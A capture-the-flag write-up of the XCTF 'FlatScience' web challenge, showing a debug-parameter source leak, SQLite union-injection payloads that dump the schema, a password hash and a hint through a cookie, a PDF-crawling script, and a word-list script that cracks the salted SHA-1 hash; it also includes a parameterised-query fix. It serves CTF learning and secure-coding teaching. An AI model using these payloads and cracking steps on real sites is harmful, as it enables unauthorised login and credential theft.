攻防世界 (XCTF Attack & Defense World): FlatScience

  • Clicking around the site, the URLs keep changing.
  • Scan the site directly with dirsearch.
  • robots.txt has turned up in a lot of challenges lately! Visiting it reveals admin.php and login.php.
  • Opening login.php gives a login window. Opening admin.php also gives a login window, but there the account name is already given to you.
  • Faced with a login form and nothing else, try SQL injection.
  • This reminds me of a SQL injection plus md5 problem I did before.
  • But for this one you need to see the query code first.
  • Viewing the page source (F12) turns up the comment TODO: Remove ?debug-Parameter!; appending ?debug to login.php makes it print its own source (the highlight_file call at the bottom):
<?php
// login.php as shown by the ?debug parameter (see highlight_file at the bottom)
if(isset($_POST['usr']) && isset($_POST['pw'])){
    $user = $_POST['usr'];
    $pass = $_POST['pw'];
    $db = new SQLite3('../fancy.db');

    // $user is concatenated straight into the SQL text, so it is injectable;
    // the password is compared as sha1($pass . "Salz!")
    $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }
    if(isset($row['id'])){
        // whatever the query returned as `name` is written into the cookie
        setcookie('name',' '.$row['name'], time() + 60, '/');
        header("Location: /");
        die();
    }
}
if(isset($_GET['debug']))
    highlight_file('login.php');
?>
  • The two key lines:
 $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");

 setcookie('name',' '.$row['name'], time() + 60, '/');
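As an added example (my own Python, not the challenge's code or the author's), the two key lines are rebuilt against an in-memory SQLite database with the Users schema the write-up recovers below: `login_vulnerable` splices the username into the SQL text exactly as login.php does and returns what would land in the `name` cookie, while `login_fixed` binds the same input through a parameterised query. The row contents, the password `example-password` and the function names are constructed for the example; the two payloads are the ones used in the write-up.

```python
import hashlib
import sqlite3

SALT = "Salz!"  # the constant suffix login.php appends before hashing


def sha1_salted(password):
    """Same value as PHP's sha1($pass."Salz!")."""
    return hashlib.sha1((password + SALT).encode()).hexdigest()


def make_db():
    """In-memory stand-in for fancy.db. The schema is the one the
    sqlite_master query reveals; the row contents are constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users(id int primary key,name varchar(255),"
               "password varchar(255),hint varchar(255))")
    db.execute("INSERT INTO Users VALUES (?,?,?,?)",
               (1, "admin", sha1_salted("example-password"),
                "my fav word in my fav paper?!"))
    db.commit()
    return db


def login_vulnerable(db, user, pw):
    """Mirror of login.php: the username is spliced into the SQL text.
    Returns the `name` column of every row the query yields (login.php
    writes the first of them into the cookie), or [] when nothing matches."""
    sql = ("SELECT id,name from Users where name='" + user +
           "' and password='" + sha1_salted(pw) + "'")
    return [row[1] for row in db.execute(sql).fetchall()]


def login_fixed(db, user, pw):
    """Hardened version: a parameterised query binds the input as a value,
    so quotes, UNION and -- inside the username are never parsed as SQL
    (in PHP: SQLite3::prepare plus bindValue)."""
    cur = db.execute("SELECT id,name FROM Users WHERE name=? AND password=?",
                     (user, sha1_salted(pw)))
    return [row[1] for row in cur.fetchall()]


# the two payloads from the write-up
SCHEMA_PAYLOAD = "' union select name,sql from sqlite_master--"
HASH_PAYLOAD = "' union select name,password from Users--"


def demo():
    db = make_db()
    leaked = login_vulnerable(db, SCHEMA_PAYLOAD, "anything")
    print("vulnerable, cookie would carry:", leaked)
    print("fixed, same payload:", login_fixed(db, SCHEMA_PAYLOAD, "anything"))
    print("fixed, real login:", login_fixed(db, "admin", "example-password"))
    return leaked


if __name__ == "__main__":
    demo()
```

The fix is binding, not escaping: with `?` placeholders the username is a value and never part of the statement. A second weakness the example leaves visible on purpose is the password storage: sha1 over the password plus a fixed string is a pepper, not a per-user salt, and SHA-1 is fast, which is exactly why a word list built from the site's papers can recover the password later in the write-up; a slow password hash (PHP's password_hash, or scrypt/argon2) would remove that shortcut.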
  • So whatever the query returns as `name` ends up in the cookie.
  • A bit of background on the SQLite database:
  • SQLite has a sqlite_master table (the global schema table); it stores the definitions of all tables, views, indexes and triggers in the database, so the SQL that created the user tables can be read from it.
  • ' union select name,sql from sqlite_master--
  • Result:
  • Set-Cookie: name=+CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29; expires=Wed, 24-Feb-2021 11:27:33 GMT; Max-Age=60; path=/
  • Decoded: CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255)); expires=Wed, 24-Feb-2021 11:27:33 GMT; Max-Age=60; path=/
  • This gives the Users table with the fields id, name, password, hint.
  • Query the password: ' union select name,password from Users--
  • This gives 3fab54a50e770d830c0416df817567662a9dc85c
  • which should be the result of sha1($pass."Salz!").
  • Happily, some online hash-lookup sites can reverse this one.
  • Logging in to admin.php directly with the recovered password, ThinJerboa, works.
  • That is the unintended solution.
  • The intended solution follows.
  • Query the hint: ' union select name,hint from Users--
  • my fav word in my fav paper?!
  • So the password is in one of the site's papers. Two days ago I was lamenting that I had no time to practise Python; here is the opportunity.
  • First, crawl all the files.
  • Code:
import os
import re
import requests

# PDF file names on the site are 32 hex characters plus .pdf;
# the sub-pages are linked as 1/index.html, 2/index.html, ...
RE_PDF = re.compile(r'[a-fA-F0-9]{32}\.pdf')
RE_HTML = re.compile(r'[0-9/]{2}index\.html')

# output directory (the original used a fixed Windows desktop path)
OUT_DIR = 'pdf'

def get_pdf(url, pdf_list=None, visited=None):
    """Recursively collect the URLs of all PDFs linked from url and its sub-pages."""
    if pdf_list is None:
        pdf_list = []
    if visited is None:
        visited = set()
    if url in visited:          # do not fetch a page twice (and never recurse forever)
        return pdf_list
    visited.add(url)
    print(url)
    req = requests.get(url).text   # the page HTML as text
    # every PDF file name on this page
    for index in RE_PDF.findall(req):
        pdf_list.append(url + index)
    # many more PDFs live on the sub-pages, so visit each of them and collect theirs too
    for j in RE_HTML.findall(req):
        new_url = url + j[0:2]    # keep only the "1/" prefix of "1/index.html"
        print(new_url)
        get_pdf(new_url, pdf_list, visited)
    return pdf_list

def download(i, url):
    """Save the PDF at url as <i>.pdf inside OUT_DIR."""
    file_name = str(i) + '.pdf'
    req = requests.get(url)
    os.makedirs(OUT_DIR, exist_ok=True)
    with open(os.path.join(OUT_DIR, file_name), 'wb') as f:
        f.write(req.content)   # .content is the raw bytes of the response body
    print('Successfully downloaded ' + file_name)

if __name__ == '__main__':
    pdf_list = get_pdf('http://111.200.241.244:41641/')
    for i in range(len(pdf_list)):
        download(i, pdf_list[i])
  • Above is the code that downloads all the PDF files.
  • Tested and working.
  • What comes next is a script from a stronger player (the "boss"), which extracts the text of every PDF and tries each word against the leaked hash:
from io import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import os
import hashlib

# hash leaked through the union-select query, i.e. sha1($pass."Salz!")
TARGET = '3fab54a50e770d830c0416df817567662a9dc85c'
SALT = 'Salz!'

def get_pdf():
    """All .pdf files in the current directory."""
    return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_2_text(path):
    """Extract the text of one PDF with pdfminer (pdfminer.six on Python 3)."""
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text


def find_password():
    for i in get_pdf():
        print("Searching word in " + i)
        # split on any whitespace so that words at line ends are not missed
        for word in convert_pdf_2_text(i).split():
            sha1_password = hashlib.sha1((word + SALT).encode()).hexdigest()
            if sha1_password == TARGET:
                print("Find the password :" + word)
                sys.exit()

if __name__ == "__main__":
    find_password()
  • Running it prints the password; logging in to the admin account with it shows the flag.
  • The second script is beyond my ability...

Source: blog.csdn.net/CyhDl666/article/details/114004545